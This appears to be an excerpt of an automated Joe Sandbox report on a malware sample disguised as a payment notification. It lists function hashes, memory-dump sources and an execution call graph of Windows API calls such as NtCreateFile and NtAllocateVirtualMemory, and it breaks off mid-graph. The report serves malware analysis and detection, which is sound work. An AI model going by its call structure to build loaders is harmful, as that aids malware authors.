                                              • Opcode ID: 7213adb8b22e62c79c1747b322336ef2a849a762e24e8cdc7d920c47e3586558
                                              • Instruction ID: a269d59df27d37938fadaa2baf7bf97f22e60af88365774a54d0c7e2c17d94b5
                                              • Opcode Fuzzy Hash: 7213adb8b22e62c79c1747b322336ef2a849a762e24e8cdc7d920c47e3586558
                                              • Instruction Fuzzy Hash: CAE03976B041246F5304DA6EEC84C6BBBEEEBCD664351817AF508C7314DA309C0086A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076AE394 Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5205af11b44a67cab14e8ab2c32197bfb4d63a3070b882ba00e6cba7fabdf6a
                                              • Instruction ID: 773e311ca303f772bcf69d094aebfc73d1db92fe4e201876fab4edd48a4c0cf0
                                              • Opcode Fuzzy Hash: f5205af11b44a67cab14e8ab2c32197bfb4d63a3070b882ba00e6cba7fabdf6a
                                              • Instruction Fuzzy Hash: E8013178A05119CFE754EF64C8557AD77B2FB89304F0045E5990DA7348CA345E89CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076AF709 Relevance: .0, Instructions: 25COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc07ae89fbd02e25796da44a83fc6a341eb4094bf234fdc186e82527c6da6e2a
                                              • Instruction ID: e129305835fa540d6357782ae9a50cdc29e79564fba0bf1aede895953ed89e01
                                              • Opcode Fuzzy Hash: bc07ae89fbd02e25796da44a83fc6a341eb4094bf234fdc186e82527c6da6e2a
                                              • Instruction Fuzzy Hash: 34F0ED7880C209AFC705CFA0E801A98FF70AB11300F20819AEC4063342CB32A961CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076AA909 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c789785ba0e5e42edb49a2a246a56e5aa637a78a2d8d78bd3b64f3bd97498ecf
                                              • Instruction ID: 9f1bec77fabc88e345810d366e2fc03d6141d858bca3fd24cb1429d96b07dcc9
                                              • Opcode Fuzzy Hash: c789785ba0e5e42edb49a2a246a56e5aa637a78a2d8d78bd3b64f3bd97498ecf
                                              • Instruction Fuzzy Hash: 35F0A0B5C08395CBFF11DFA88C41B99BFA0AB16310F4481DEC8865B246E7708D81CF62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076AF718 Relevance: .0, Instructions: 18COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16364800410e9e65a5f1fd89a32ae23a2e7659e459c04f168e956998b02511e6
                                              • Instruction ID: f83ec3062a4c94987ce8f7191624d5fceeabd9ed51e1ec07b65d1ff2eb981bd7
                                              • Opcode Fuzzy Hash: 16364800410e9e65a5f1fd89a32ae23a2e7659e459c04f168e956998b02511e6
                                              • Instruction Fuzzy Hash: BBE08C78918208EBCB04DFA4E841A9CFF75EB45300F20C2A9EC4423340CB32AE52DA95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076AED80 Relevance: .0, Instructions: 18COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9ccd54bcf12bd55ee2f08efa6ca2f45ae9aa4dc2aa2257e5f107d6025d6cabb
                                              • Instruction ID: d7919067339ff90f414a17149988b4a04b194c186837f8db0218d5739eca8771
                                              • Opcode Fuzzy Hash: a9ccd54bcf12bd55ee2f08efa6ca2f45ae9aa4dc2aa2257e5f107d6025d6cabb
                                              • Instruction Fuzzy Hash: 1ED012B541910CEBC711EFB4D51569E7FB9EB45205F0442A6AD0693110EF321E44DFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076AE25E Relevance: .0, Instructions: 15COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f59746e9aec6b43543e20f16517c259585415897f34d340322e93b30a44a44ea
                                              • Instruction ID: 20f72b4804751a89e1a17a94865f0957d2e58b672c7d643cf896fb854984d0ac
                                              • Opcode Fuzzy Hash: f59746e9aec6b43543e20f16517c259585415897f34d340322e93b30a44a44ea
                                              • Instruction Fuzzy Hash: 49E04674A1811D8FEB14EF28C4607AD77B2FB89304F0041A88809A7388CB381E8ACF00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A302E Relevance: .0, Instructions: 13COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e303159323018fa401243ced102fb245963ebd7e253fb2d7db67e93d4032f372
                                              • Instruction ID: 300cf5f9b5db9f4ad8c43db39ddf86195307f364d2308ae79756b75e4778924d
                                              • Opcode Fuzzy Hash: e303159323018fa401243ced102fb245963ebd7e253fb2d7db67e93d4032f372
                                              • Instruction Fuzzy Hash: 9BE001B8E14259DF8B00CFA5D98089CBBB0BF09340F24942AE802A7304E670AC028F00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A4CF8 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2beb574b11fb568ac17176699bb52ad4cdfb7d3bbc41ecc7418c0bc9f9884a31
                                              • Instruction ID: da1c10cdb814a8a61068c66b0c592690cb1e2224b142fb4749d2a12ab93f1342
                                              • Opcode Fuzzy Hash: 2beb574b11fb568ac17176699bb52ad4cdfb7d3bbc41ecc7418c0bc9f9884a31
                                              • Instruction Fuzzy Hash: 7DC0123402D2094BCA80FBB5EAA5456376BAA813087808C2095048E539DF70A6448A96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A8A38 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e5e0f654153c61d61426e2d30d86c303bf1355ddad46bded936ec9a8114083e
                                              • Instruction ID: 8f65d303aa9b1a83324e1e10f2d326d0645836d1259f322c812642fe03b80846
                                              • Opcode Fuzzy Hash: 2e5e0f654153c61d61426e2d30d86c303bf1355ddad46bded936ec9a8114083e
                                              • Instruction Fuzzy Hash: FBC08CF78A0040AFE302AE209C008466F56EB37204B02C8A29002CE0B2E939C4249B25
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A3050 Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1c8ead85bcff0e75f214515c6c40201d3363de80a04c3f463e7df0c06d32de8
                                              • Instruction ID: 9f0441d24ac2ca17ac1d8c62d25b853d34ea23e52a65a6e3a79d3515f6bab7cd
                                              • Opcode Fuzzy Hash: c1c8ead85bcff0e75f214515c6c40201d3363de80a04c3f463e7df0c06d32de8
                                              • Instruction Fuzzy Hash: 99D0B1B8D2431DEB9B00DFA5D99889DBBB2BB4A341B10542AA80AAB350E7306D45CF10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 076A3018 Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f6fa39e438241eb65d5c19587e727a3430ffa5d0820af7343df99dd7a92bfba6
                                              • Instruction ID: 11519933149e10041101248e62498eef665c0f541601a0d5698699ad240f748c
                                              • Opcode Fuzzy Hash: f6fa39e438241eb65d5c19587e727a3430ffa5d0820af7343df99dd7a92bfba6
                                              • Instruction Fuzzy Hash: E0D0B1B8D26219FFCB04CFA5EA9489DBBB1BB5A690B10646AF812A2300E63059018E10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 02F1EB98 Relevance: .3, Instructions: 315COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c9e26ff6831fc83d152d48e9f73c27590cab08f8d10d05a7efefdb38cc37984
                                              • Instruction ID: e80808b5a0752149063f4b9dc1838e29c3423bbe9c60cf9bf5e3ec4df4dea9ca
                                              • Opcode Fuzzy Hash: 9c9e26ff6831fc83d152d48e9f73c27590cab08f8d10d05a7efefdb38cc37984
                                              • Instruction Fuzzy Hash: 2312B4F14217468AD332CF65E99B28D3FE9B75532CF904208F2616EAD1DBB8114ACF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F1C754 Relevance: .3, Instructions: 265COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae43929a1ec5d080e3066ba0cc0fa944b55a7f390e613504a3e1934d6525fc53
                                              • Instruction ID: 4e7e6e7e551c4cab11947749896231a9111a6d08ec1e18fe77b195638e77ebb8
                                              • Opcode Fuzzy Hash: ae43929a1ec5d080e3066ba0cc0fa944b55a7f390e613504a3e1934d6525fc53
                                              • Instruction Fuzzy Hash: 12A18C32E002198FCF15DFA5C8849DEBBF2FF85340B55816AEA05AB260EB71E905CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02F1EB88 Relevance: .2, Instructions: 222COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e27573148bb2e3cbcf065375d174f1c262917c33ab890f8691019b77a0bdd192
                                              • Instruction ID: 7a329e83c8f1ca29cea976fdab8b678a2514cceccfc5db15a45b59f86b0b4ee2
                                              • Opcode Fuzzy Hash: e27573148bb2e3cbcf065375d174f1c262917c33ab890f8691019b77a0bdd192
                                              • Instruction Fuzzy Hash: CCC105B18217468AD721DF65E98B18D3FE9BB9532CF504208F2616F6D0DBB8508ACF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:7.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:3.4%
                                              Total number of Nodes:725
                                              Total number of Limit Nodes:81
                                              execution_graph 15978 41f270 15981 41b9d0 15978->15981 15982 41b9f6 15981->15982 15993 409150 15982->15993 15984 41ba02 15992 41ba49 15984->15992 16001 40d760 15984->16001 15986 41ba17 15987 41ba2c 15986->15987 16049 41a660 15986->16049 16013 40ac00 15987->16013 15990 41ba3b 15991 41a660 2 API calls 15990->15991 15991->15992 16052 4090a0 15993->16052 15995 40915d 15996 409164 15995->15996 16064 409040 15995->16064 15996->15984 16002 40d78c 16001->16002 16576 40a600 16002->16576 16004 40d79e 16580 40d670 16004->16580 16007 40d7b9 16008 41a440 2 API calls 16007->16008 16010 40d7c4 16007->16010 16008->16010 16009 40d7d1 16011 41a440 2 API calls 16009->16011 16012 40d7e2 16009->16012 16010->15986 16011->16012 16012->15986 16014 40ac25 16013->16014 16015 40a600 LdrLoadDll 16014->16015 16016 40ac7c 16015->16016 16596 40a280 16016->16596 16018 40aca2 16048 40aef3 16018->16048 16605 414fe0 16018->16605 16020 40ace7 16020->16048 16608 407e10 16020->16608 16022 40ad2b 16022->16048 16631 41a4b0 16022->16631 16026 40ad81 16027 40ad88 16026->16027 16029 419fc0 LdrLoadDll 16026->16029 16028 41bee0 2 API calls 16027->16028 16030 40ad95 16028->16030 16031 40adc5 16029->16031 16030->15990 16032 40add2 16031->16032 16035 40ade2 16031->16035 16033 41bee0 2 API calls 16032->16033 16034 40add9 16033->16034 16034->15990 16036 40d7f0 LdrLoadDll 16035->16036 16037 40ae56 16036->16037 16037->16027 16038 40ae61 16037->16038 16039 41bee0 2 API calls 16038->16039 16040 40ae85 16039->16040 16641 41a010 16040->16641 16043 419fc0 LdrLoadDll 16044 40aec0 16043->16044 16044->16048 16644 419dd0 16044->16644 16047 41a660 2 API calls 16047->16048 16048->15990 16050 41af60 LdrLoadDll 16049->16050 16051 41a67f ExitProcess 16050->16051 16051->15987 16083 418b80 16052->16083 16056 4090bc 16057 4090c6 16056->16057 16090 41b310 16056->16090 16057->15995 16059 409103 16059->16057 16101 408ec0 16059->16101 16061 409123 16111 408920 16061->16111 16063 409135 16063->15995 16559 41b600 16064->16559 16067 41b600 LdrLoadDll 16068 40906b 16067->16068 16069 41b600 LdrLoadDll 16068->16069 16070 409081 16069->16070 16071 40d560 16070->16071 16072 40d579 16071->16072 16563 40a480 16072->16563 16074 40d58c 16567 41a190 16074->16567 16078 40d5b2 16081 40d5dd 16078->16081 16573 41a210 16078->16573 16080 41a440 2 API calls 16082 409175 16080->16082 16081->16080 16082->15984 16084 418b8f 16083->16084 16115 415a90 16084->16115 16086 4090b3 16087 418a30 16086->16087 16147 41a5b0 16087->16147 16091 41b329 16090->16091 16154 415690 16091->16154 16093 41b341 16094 41b34a 16093->16094 16193 41b150 16093->16193 16094->16059 16096 41b35e 16096->16094 16210 419eb0 16096->16210 16520 407210 16101->16520 16103 408eda 16104 408ee1 16103->16104 16533 407420 16103->16533 16104->16061 16106 408ef7 16108 408f7c 16106->16108 16538 407450 16106->16538 16543 4074d0 16108->16543 16112 408948 16111->16112 16552 40a350 16112->16552 16114 40897e 16114->16063 16116 415a9e 16115->16116 16117 415aaa 16115->16117 16116->16117 16120 415f10 16116->16120 16117->16086 16125 415c10 16120->16125 16122 415f28 16123 415a90 LdrLoadDll 16122->16123 16124 415bfc 16122->16124 16123->16124 16124->16086 16127 415c35 16125->16127 16126 415ca4 16126->16122 16127->16126 16139 40a130 16127->16139 16129 415cd6 16133 415d7b 16129->16133 16143 41c180 16129->16143 16132 415de1 16132->16133 16134 415f10 LdrLoadDll 16132->16134 16133->16122 16136 415e13 16134->16136 16135 415d74 16135->16133 16137 415f10 LdrLoadDll 16135->16137 16136->16122 16138 415dd7 16137->16138 16138->16122 16140 40a154 16139->16140 16141 40a190 LdrLoadDll 16140->16141 16142 40a15b 16140->16142 16141->16142 16142->16129 16144 41c190 16143->16144 16145 415d1d 16143->16145 16146 415a90 LdrLoadDll 16144->16146 16145->16132 16145->16133 16145->16135 16146->16145 16150 41af60 16147->16150 16149 418a45 16149->16056 16151 41afe5 16150->16151 16153 41af6f 16150->16153 16151->16149 16152 415a90 LdrLoadDll 16152->16151 16153->16151 16153->16152 16155 4159c5 16154->16155 16156 4156a4 16154->16156 16155->16093 16156->16155 16216 419c00 16156->16216 16159 4157d0 16219 41a310 16159->16219 16160 4157b3 16277 41a410 16160->16277 16163 4157bd 16163->16093 16164 4157f7 16165 41bee0 2 API calls 16164->16165 16168 415803 16165->16168 16166 415989 16167 41a440 2 API calls 16166->16167 16170 415990 16167->16170 16168->16163 16168->16166 16169 41599f 16168->16169 16173 415892 16168->16173 16302 4153d0 16169->16302 16170->16093 16172 4159b2 16172->16093 16174 4158f9 16173->16174 16176 4158a1 16173->16176 16174->16166 16175 41590c 16174->16175 16293 41a290 16175->16293 16178 4158a6 16176->16178 16179 4158ba 16176->16179 16280 415290 16178->16280 16180 4158d7 16179->16180 16181 4158bf 16179->16181 16180->16170 16235 415050 16180->16235 16223 415330 16181->16223 16186 4158b0 16186->16093 16187 4158cd 16187->16093 16190 4158ef 16190->16093 16192 415978 16192->16093 16194 41b16b 16193->16194 16195 41b17d 16194->16195 16365 41be60 16194->16365 16195->16096 16197 41b19d 16368 414cb0 16197->16368 16199 41b1c0 16199->16195 16200 414cb0 3 API calls 16199->16200 16202 41b1e2 16200->16202 16202->16195 16393 415fd0 16202->16393 16203 41b26a 16204 41b27a 16203->16204 16486 41aee0 16203->16486 16404 41ad50 16204->16404 16207 41b2a8 16483 419e70 16207->16483 16211 41af60 LdrLoadDll 16210->16211 16212 419ecb 16211->16212 16213 41bee0 16212->16213 16214 41b3b9 16213->16214 16517 41a620 16213->16517 16214->16059 16217 41af60 LdrLoadDll 16216->16217 16218 415784 16217->16218 16218->16159 16218->16160 16218->16163 16220 41af60 LdrLoadDll 16219->16220 16221 41a32c NtCreateFile 16220->16221 16221->16164 16224 41534c 16223->16224 16225 41a290 LdrLoadDll 16224->16225 16226 41536d 16225->16226 16227 415374 16226->16227 16228 415388 16226->16228 16230 41a440 2 API calls 16227->16230 16229 41a440 2 API calls 16228->16229 16231 415391 16229->16231 16232 41537d 16230->16232 16336 41c0f0 16231->16336 16232->16187 16234 41539c 16234->16187 16236 41509b 16235->16236 16237 4150ce 16235->16237 16238 41a290 LdrLoadDll 16236->16238 16239 415219 16237->16239 16243 4150ea 16237->16243 16240 4150b6 16238->16240 16241 41a290 LdrLoadDll 16239->16241 16242 41a440 2 API calls 16240->16242 16249 415234 16241->16249 16244 4150bf 16242->16244 16245 41a290 LdrLoadDll 16243->16245 16244->16190 16246 415105 16245->16246 16247 415121 16246->16247 16248 41510c 16246->16248 16253 415126 16247->16253 16254 41513c 16247->16254 16252 41a440 2 API calls 16248->16252 16250 41a2d0 LdrLoadDll 16249->16250 16251 41526e 16250->16251 16255 41a440 2 API calls 16251->16255 16256 415115 16252->16256 16257 41a440 2 API calls 16253->16257 16263 415141 16254->16263 16342 41c0b0 16254->16342 16258 415279 16255->16258 16256->16190 16259 41512f 16257->16259 16258->16190 16259->16190 16260 415153 16260->16190 16263->16260 16345 41a3c0 16263->16345 16264 4151a7 16268 4151be 16264->16268 16353 41a250 16264->16353 16266 4151c5 16269 41a440 2 API calls 16266->16269 16267 4151da 16270 41a440 2 API calls 16267->16270 16268->16266 16268->16267 16269->16260 16271 4151e3 16270->16271 16272 41520f 16271->16272 16348 41bcb0 16271->16348 16272->16190 16274 4151fa 16275 41bee0 2 API calls 16274->16275 16276 415203 16275->16276 16276->16190 16278 41af60 LdrLoadDll 16277->16278 16279 41a42c 16278->16279 16279->16163 16356 419f70 16280->16356 16283 4152d4 16285 41a440 2 API calls 16283->16285 16284 4152e8 16359 419fc0 16284->16359 16287 4152dd 16285->16287 16287->16186 16289 41a440 2 API calls 16290 415312 16289->16290 16291 41a440 2 API calls 16290->16291 16292 41531c 16291->16292 16292->16186 16294 415954 16293->16294 16295 41af60 LdrLoadDll 16293->16295 16296 41a2d0 16294->16296 16295->16294 16297 41af60 LdrLoadDll 16296->16297 16298 41596c 16297->16298 16299 41a440 16298->16299 16300 41af60 LdrLoadDll 16299->16300 16301 41a45c NtClose 16300->16301 16301->16192 16303 41540e 16302->16303 16304 41a290 LdrLoadDll 16302->16304 16305 415417 16303->16305 16306 41542c 16303->16306 16304->16303 16307 41a440 2 API calls 16305->16307 16308 415450 16306->16308 16309 41549a 16306->16309 16322 415420 16307->16322 16362 41a370 16308->16362 16311 4154e0 16309->16311 16312 41549f 16309->16312 16315 4154f2 16311->16315 16319 41561a 16311->16319 16314 41a3c0 2 API calls 16312->16314 16312->16322 16317 4154ca 16314->16317 16318 4154f7 16315->16318 16329 415532 16315->16329 16316 41a440 2 API calls 16316->16322 16320 41a440 2 API calls 16317->16320 16321 41a370 LdrLoadDll 16318->16321 16319->16322 16325 41a3c0 2 API calls 16319->16325 16323 4154d3 16320->16323 16324 41551a 16321->16324 16322->16172 16323->16172 16326 41a440 2 API calls 16324->16326 16328 415671 16325->16328 16330 415523 16326->16330 16327 41a370 LdrLoadDll 16331 41555a 16327->16331 16332 41a440 2 API calls 16328->16332 16329->16322 16329->16327 16330->16172 16333 41a440 2 API calls 16331->16333 16334 41567a 16332->16334 16335 415565 16333->16335 16334->16172 16335->16172 16339 41a5e0 16336->16339 16338 41c10a 16338->16234 16340 41af60 LdrLoadDll 16339->16340 16341 41a5fc RtlAllocateHeap 16340->16341 16341->16338 16343 41a5e0 2 API calls 16342->16343 16344 41c0c8 16342->16344 16343->16344 16344->16263 16346 41af60 LdrLoadDll 16345->16346 16347 41a3dc NtReadFile 16346->16347 16347->16264 16349 41bcd4 16348->16349 16350 41bcbd 16348->16350 16349->16274 16350->16349 16351 41c0b0 2 API calls 16350->16351 16352 41bceb 16351->16352 16352->16274 16354 41af60 LdrLoadDll 16353->16354 16355 41a26c 16354->16355 16355->16268 16357 4152cd 16356->16357 16358 41af60 LdrLoadDll 16356->16358 16357->16283 16357->16284 16358->16357 16360 41af60 LdrLoadDll 16359->16360 16361 415309 16360->16361 16361->16289 16363 41af60 LdrLoadDll 16362->16363 16364 415475 16363->16364 16364->16316 16491 41a4f0 16365->16491 16367 41be8d 16367->16197 16369 414cc1 16368->16369 16370 414cc9 16368->16370 16369->16199 16392 414f9c 16370->16392 16494 41d090 16370->16494 16372 414d1d 16373 41d090 2 API calls 16372->16373 16377 414d28 16373->16377 16374 414d76 16376 41d090 2 API calls 16374->16376 16379 414d8a 16376->16379 16377->16374 16499 41d130 16377->16499 16378 41d090 2 API calls 16381 414dfd 16378->16381 16379->16378 16380 41d090 2 API calls 16389 414e45 16380->16389 16381->16380 16384 41d0f0 2 API calls 16385 414f7e 16384->16385 16386 41d0f0 2 API calls 16385->16386 16387 414f88 16386->16387 16388 41d0f0 2 API calls 16387->16388 16390 414f92 16388->16390 16505 41d0f0 16389->16505 16391 41d0f0 2 API calls 16390->16391 16391->16392 16392->16199 16394 415fe1 16393->16394 16395 415690 6 API calls 16394->16395 16400 415ff7 16395->16400 16396 416000 16396->16203 16397 416037 16398 41bee0 2 API calls 16397->16398 16399 416048 16398->16399 16399->16203 16400->16396 16400->16397 16401 416083 16400->16401 16402 41bee0 2 API calls 16401->16402 16403 416088 16402->16403 16403->16203 16405 41ad64 16404->16405 16406 41abe0 LdrLoadDll 16404->16406 16508 41abe0 16405->16508 16406->16405 16408 41ad6d 16409 41abe0 LdrLoadDll 16408->16409 16410 41ad76 16409->16410 16411 41abe0 LdrLoadDll 16410->16411 16412 41ad7f 16411->16412 16413 41abe0 LdrLoadDll 16412->16413 16414 41ad88 16413->16414 16415 41abe0 LdrLoadDll 16414->16415 16416 41ad91 16415->16416 16417 41abe0 LdrLoadDll 16416->16417 16418 41ad9d 16417->16418 16419 41abe0 LdrLoadDll 16418->16419 16420 41ada6 16419->16420 16421 41abe0 LdrLoadDll 16420->16421 16422 41adaf 16421->16422 16423 41abe0 LdrLoadDll 16422->16423 16424 41adb8 16423->16424 16425 41abe0 LdrLoadDll 16424->16425 16426 41adc1 16425->16426 16427 41abe0 LdrLoadDll 16426->16427 16428 41adca 16427->16428 16429 41abe0 LdrLoadDll 16428->16429 16430 41add6 16429->16430 16431 41abe0 LdrLoadDll 16430->16431 16432 41addf 16431->16432 16433 41abe0 LdrLoadDll 16432->16433 16434 41ade8 16433->16434 16435 41abe0 LdrLoadDll 16434->16435 16436 41adf1 16435->16436 16437 41abe0 LdrLoadDll 16436->16437 16438 41adfa 16437->16438 16439 41abe0 LdrLoadDll 16438->16439 16440 41ae03 16439->16440 16441 41abe0 LdrLoadDll 16440->16441 16442 41ae0f 16441->16442 16443 41abe0 LdrLoadDll 16442->16443 16444 41ae18 16443->16444 16445 41abe0 LdrLoadDll 16444->16445 16446 41ae21 16445->16446 16447 41abe0 LdrLoadDll 16446->16447 16448 41ae2a 16447->16448 16449 41abe0 LdrLoadDll 16448->16449 16450 41ae33 16449->16450 16451 41abe0 LdrLoadDll 16450->16451 16452 41ae3c 16451->16452 16453 41abe0 LdrLoadDll 16452->16453 16454 41ae48 16453->16454 16455 41abe0 LdrLoadDll 16454->16455 16456 41ae51 16455->16456 16457 41abe0 LdrLoadDll 16456->16457 16458 41ae5a 16457->16458 16459 41abe0 LdrLoadDll 16458->16459 16460 41ae63 16459->16460 16461 41abe0 LdrLoadDll 16460->16461 16462 41ae6c 16461->16462 16463 41abe0 LdrLoadDll 16462->16463 16464 41ae75 16463->16464 16465 41abe0 LdrLoadDll 16464->16465 16466 41ae81 16465->16466 16467 41abe0 LdrLoadDll 16466->16467 16468 41ae8a 16467->16468 16469 41abe0 LdrLoadDll 16468->16469 16470 41ae93 16469->16470 16471 41abe0 LdrLoadDll 16470->16471 16472 41ae9c 16471->16472 16473 41abe0 LdrLoadDll 16472->16473 16474 41aea5 16473->16474 16475 41abe0 LdrLoadDll 16474->16475 16476 41aeae 16475->16476 16477 41abe0 LdrLoadDll 16476->16477 16478 41aeba 16477->16478 16479 41abe0 LdrLoadDll 16478->16479 16480 41aec3 16479->16480 16481 41abe0 LdrLoadDll 16480->16481 16482 41aecc 16481->16482 16482->16207 16484 41af60 LdrLoadDll 16483->16484 16485 419e8c 16484->16485 16485->16096 16488 41aef2 16486->16488 16487 41af01 16487->16204 16488->16487 16514 41a470 16488->16514 16492 41a50c NtAllocateVirtualMemory 16491->16492 16493 41af60 LdrLoadDll 16491->16493 16492->16367 16493->16492 16495 41d0a0 16494->16495 16496 41d0a6 16494->16496 16495->16372 16497 41c0b0 2 API calls 16496->16497 16498 41d0cc 16497->16498 16498->16372 16500 41d155 16499->16500 16504 41d18d 16499->16504 16501 41c0b0 2 API calls 16500->16501 16502 41d16a 16501->16502 16503 41bee0 2 API calls 16502->16503 16503->16504 16504->16377 16506 414f74 16505->16506 16507 41bee0 2 API calls 16505->16507 16506->16384 16507->16506 16509 41abfb 16508->16509 16510 415a90 LdrLoadDll 16509->16510 16511 41ac1b 16510->16511 16512 415a90 LdrLoadDll 16511->16512 16513 41accf 16511->16513 16512->16513 16513->16408 16513->16513 16515 41a48c 16514->16515 16516 41af60 LdrLoadDll 16514->16516 16515->16204 16516->16515 16518 41a63c RtlFreeHeap 16517->16518 16519 41af60 LdrLoadDll 16517->16519 16518->16214 16519->16518 16521 407220 16520->16521 16522 40721b 16520->16522 16523 41be60 2 API calls 16521->16523 16522->16103 16525 407245 16523->16525 16524 4072a8 16524->16103 16525->16524 16526 419e70 LdrLoadDll 16525->16526 16527 